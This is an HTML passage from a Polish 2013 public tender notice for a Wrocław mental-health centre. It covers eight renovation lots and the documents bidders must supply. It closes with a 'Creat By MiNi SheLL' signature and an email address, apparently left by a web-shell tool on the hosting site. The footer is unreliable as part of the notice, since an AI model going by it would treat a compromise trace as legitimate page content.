<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie produktów, które mają zostać dostarczone, których autentyczność musi zostać poświadczona przez wykonawcę na żądanie zamawiającego;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.dczp.wroclaw.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dolnośląskie Centrum Zdrowia Psychicznego
Spółka z ograniczoną odpowiedzialnością
ul. Wybrzeże J. C-Korzeniowskiego 18, 50-226 Wrocław.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.05.2013 godzina 10:00, miejsce: Dolnośląskie Centrum Zdrowia Psychicznego Spółka z ograniczoną odpowiedzialnością z siedzibą ul. Wybrzeże J. C Korzeniowskiego 18, 50-226 Wrocław -  Sekretariat..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany przez Unię Europejską z Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego dla Województwa Dolnośląskiego na lata 2007-2013 pn.Termomodernizacja budynków Dolnośląskiego Centrum Zdrowia Psychicznego sp. z o.o...</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa i wymiana okien  i parapetów wewnętrznych oraz uzupełnienie parapetów zewnętrznych w budynku N.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Zakres prac zadania nr 1:
1)demontaż starych  okien i parapetów wewnętrznych;
2)dostawa i transport nowych okien  i prapetów wewnętrznych na teren DCZP sp. z o.o.;
3)montaż nowych okien drewnianych ( PCV), jednoramowych,  dwuskrzydłowych, rozwierno uchylnych, z jednym  lufcikiem, w kolorze złotego dębu;
4)montaż  parapetów drewnianych  wewnętrznych, o grubości min. 2,5 cm, w kolorze złotego dębu;
5)obróbka okna :
a)wykonanie tynków  zwykłych wewnętrznych, 
b)przygotowanie powierzchni wewnętrznych pod malowanie farbami  lateksowymi,
c)pomalowanie powierzchni wewnętrznych farbami  lateksowymi,
d)wykonanie tynków  zwykłych zewnętrznych,
6)wywiezienie gruzu z powstałego podczas demontażu okien;
7)uzupełnienie  parapetów zewnętrznych płytką klinkierową ( ok.  2 m).
2.Szczegółowy opis  zadania nr 1 zawiera formularz cenowy - załącznik nr 2.1 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.42.00.00-7, 45.45.40.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Remont dachu  papowego  budynku N.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Informacje o budynku N:
1) budynek jednopiętrowy/ dwukondygnacyjny;
2) dach płaski, o wymiarach 1800 x 1066 cm;
3) aktualne pokrycie dachu  - papowe na podłożu betonowym.
2.Zakres prac zadania nr 2: 
1)usunięcie starego pokrycia dachu papowego;
2)wykonanie nowych pokryć z papy termozgrzewalnej;
3)naprawa podłoża dachowego;
4)naprawa i wymiana obróbek blacharskich, rynien i rur spustowych; 
5)zakup materiałów niezbędnych do wykonania zadania i ich dostarczenie na miejsce realizacji;
6)usunięcie/wywiezienia z terenu DCZP sp. z o.o. starego pokrycia dachowego i obróbek blacharskich.
3.Szczegółowy opis  zadania nr 2  zawiera formularz cenowy - załącznik nr 2.2 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.26.19.10-6, 45.26.10.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Prace remontowe na oddziale VI  w budynku  G.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1)pomalowanie ścian  - farbą lateksowa wysoko zmywalną- kolor do uzgodnienia z Zamawiającym przed rozpoczęciem remontu;
2)pomalowanie sufitów  - farbą lateksową;
3)pomalowanie lamperii  - farbą olejną / mat - kolor do uzgodnienie z Zamawiającym przed rozpoczęciem remontu; 
4)położenie tynku strukturalnego KORNIK - kolor do uzgodnienia z Zamawiającym przed rozpoczęciem remontu; 
5)pomalowanie  drzwi  - farbą olejną, białą z połyskiem;
6)pomalowanie futryn drzwi i futryn prześwietleń  - farbą olejną z połyskiem;.
7)skucie starych kafelek na ścianie i położenie nowych kafelek wraz z niezbędnymi listwami wykończeniowymi  - kolor do uzgodnienia z Zamawiającym przed rozpoczęciem remontu;
8)skucie starych kafelek podłogowych i położenie nowych kafelek na podłodze -  kolor do uzgodnienia z Zamawiającym przed rozpoczęciem remontu;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.44.21.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.09.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Renowacja trzech drzwi wejściowych w budynku  G wraz z nadświetlami  i  kratami, w tym : 2 drzwi wejściowych do bocznych klatek schodowych wschodniej i zachodniej C i D oraz drzwi wejściowych głównych..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1)analiza powłok barwnych  - w celu ustalenia pierwotnej kolorystyki drzwi; 
2)oczyszczenie powierzchni Drzwi z powłok lakierniczych  - metodą chemiczną tj. przy użyciu zmywaczy powłok lakierniczych;
3)usunięcie przebarwień drewna 
4)wzmocnienie zdegradowanych partii drewna przez pędzlowanie i iniekcję roztworem ossolanu K lub paraloidu B-72 w ksylenie; 
5)wykonanie impregnacji przeciwgrzybicznej 
6)wykonanie wszystkich napraw: spękań, odspojeń, wykonanie brakujących profili, przy czym  do rekonstrukcji ubytków należy użyć wysezonowanego drewna oraz kitu i mączki sporządzonych na bazie trocin i żywic sztucznych; 
7)scalenie kolorystyczne wszystkich uzupełnień z lokalnym kolorem drewna bejcami;
8)lakierowanie drewna transparentnym lakierem barwionym w kolorze brązowym lub w innej technologii, zależnie od wyników rozpoznania konserwatorskiego; 
9)wymiana szkła na identyczne szkło bezpieczne/wandaloodporne; 
10)konserwacja elementów metalowych - tj. zawiasów, zamków, klamek, krat;
11)wykonanie dokumentacji konserwatorskiej, (zdjęć przed, po, opis środków użytych itp.)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.45.31.00-8, 45.45.40.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 23.08.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Dostawa drzwi wejściowych , bocznych, dwuskrzydłowych,  w budynku G /część zachodnia budynku/ , identycznych jak istniejące  i wymiana dotychczas istniejących na nowo dostarczone.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1)odwzorowanie istniejących drzwi o wymiarach 1560 x 2650 cm, wraz z ościeżnicą, przy czym profilowanie oraz wygląd drzwi należy odtworzyć zgodnie ze stanem istniejącym; 
2)wykonanie drzwi wraz z ościeżnicą z drewna dębowego, dopuszczalne jest drewno sosnowe;
3)zdemontowanie istniejących oryginalnych okuć   ( zawiasy zlokalizowane od wewnątrz) ich oczyszczenie, pomalowanie na kolor kutego żelaza i ponownie zamontowanie, przy czym nowe, stylizowane  okucia  należy dopasować do istniejących;
4)pomalowanie drzwi farbą zgodnie z wymogami MKZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.45.40.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.09.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Modernizacja dwóch klatek schodowych: wschodniej i zachodniej w budynku G wraz   z jego pięcioma kondygnacjami..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1)modernizacja instalacji elektrycznej ( dokumentacja techniczna/ przedmiar robót do wglądu u Zamawiającego) obejmująca:
a)wymianę instalacji elektrycznej na dwóch klatkach schodowych wraz z tablicami rozdzielczymi,
b)wymianę istniejących obwodów WLZ ( wewnętrzna linia zasilająca),
c)ułożenie istniejących obwodów oświetlenia ewakuacyjnego i instalacji oddymiania pod tynkiem, 
d)przeprowadzenie wymagalnych przepisami prawa  pomiarów,
2)przygotowanie dokumentacji powykonawczej instalacji elektrycznej;
3)wykonanie dodatkowych robót remontowych:
a)usunięcie starej farby ze ścian i sufitów,
b)malowanie sufitów farbą wysoko zmywalną, lateksową,
c)malowanie ścian farbą wysoko zmywalną, lateksową oraz lamperii farbą olejną,
d)usunięcie starej instalacji wodnej,
e)skucie części tynków  (opisane w załączniku nr 2.6),
f)uzupełnienie tynków ścian,
g)zabudowanie przewodów instalacyjnych płytami GKB pojedynczo, jednostronnie,
h)położenie sufitu z płyt GKB w piwnicy,
i)renowacja pochwytu drewnianego,
j)wymiana części pochwytu drewnianego,
k)renowacja i uzupełnienie cokołów drewnianych,
l)renowacja ozdobnych krat zabezpieczających..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.45.31.00-8, 45.45.40.00-4, 45.44.21.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Malowanie holu wejścia głównego w budynku G.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1)pomalowanie sufitu i ścian farbą wysoko zmywalną lateksową -  kolor do uzgodnienie z Zamawiającym przed rozpoczęciem remontu, 
2)położenie tynk strukturalny wewnętrzny baranek o średnicy 1,5mm -  kolor do uzgodnienie z Zamawiającym przed rozpoczęciem remontu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.44.21.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Dostawa i wymiana stolarki drewnianej okiennej (okien, parapetów wewnętrznych oraz uzupełnienie parapetów zewnętrznych ) w budynku  G..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Nowo wbudowana stolarka okienna we wszystkich otworach okiennych przeznaczonych do wymiany musi odpowiadać następującym wymogom:
1)musi być drewniana, w tym parapety wewnętrzne ( wkuwane, min. grubość 2,5 cm);
2)odzwierciedlać stolarkę istniejącą;
3)musi być tej samej wielkości co w oknach istniejących z podziałem i szprosami, przy czym  proponuje się zastosowanie szprosów-podziałów zamontowanych,  naklejanych na szybach;
4)wymiana stolarki nie może zakłócić kompozycji fasady i musi zachować rys historyczny elewacji budynku G;
5)profile i szerokość ślemion, słupków i szprosów nowej stolarki, w częściach widocznych od zewnątrz muszą powtarzać profile i szerokość w starej stolarce;
6)dopuszcza się możliwość zastosowania szprosów pionowych i poziomych ( ruchomych) nakładanych od zewnątrz i od wewnątrz na tafle szkła;
7)powinna powtórzyć sposób otwierania dotychczasowych - starych skrzydeł okiennych;
8)należy przewidzieć otwierane ( uchylne) naświetla; 
9)należy zastosować szybę tzw. bezpieczną ;
10)w klamkach okien,  poza oknami w piwnicy, należy przewidzieć zamki.
2.Przed złożeniem oferty należy zapoznać się z dokumentacja techniczną i decyzją Miejskiego Konserwatora Zabytków - dokumentacja do wglądu w siedzibie Zamawiającego.
3.Zakres  prac zadania nr 8:
1)wykonanie zadaszenia przed wejściem do budynku G;
2)oznaczenie miejsca wykonania robót;
3)demontaż pojedynczych skrzydeł okiennych;
4)wykucie istniejącej ram okiennej z istniejącego oścież; 
5)osadzenie nowych okien;
6)opiankowanie  przestrzeni pomiędzy oknami a ościeżnicą; 
7)założenie haków kotwiących;
8)uzupełnienie tynków zewnętrznym i wewnętrznym na ościeżach; 
9)malowanie ościeży wewnętrznych kolorem zbliżonym do koloru pomieszczenia, w którym  wymieniono okno;
10)zamontowanie parapetów wewnętrznych;
11)uzupełnienie parapetów zewnętrznych płytką klinkierową (o łącznej długości parapetu 2 m);
12)usuniecie wykutych ram, starych okien i innych elementów z terenu Spółki..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.42.00.00-7, 45.45.31.00-8, 45.45.40.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.11.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com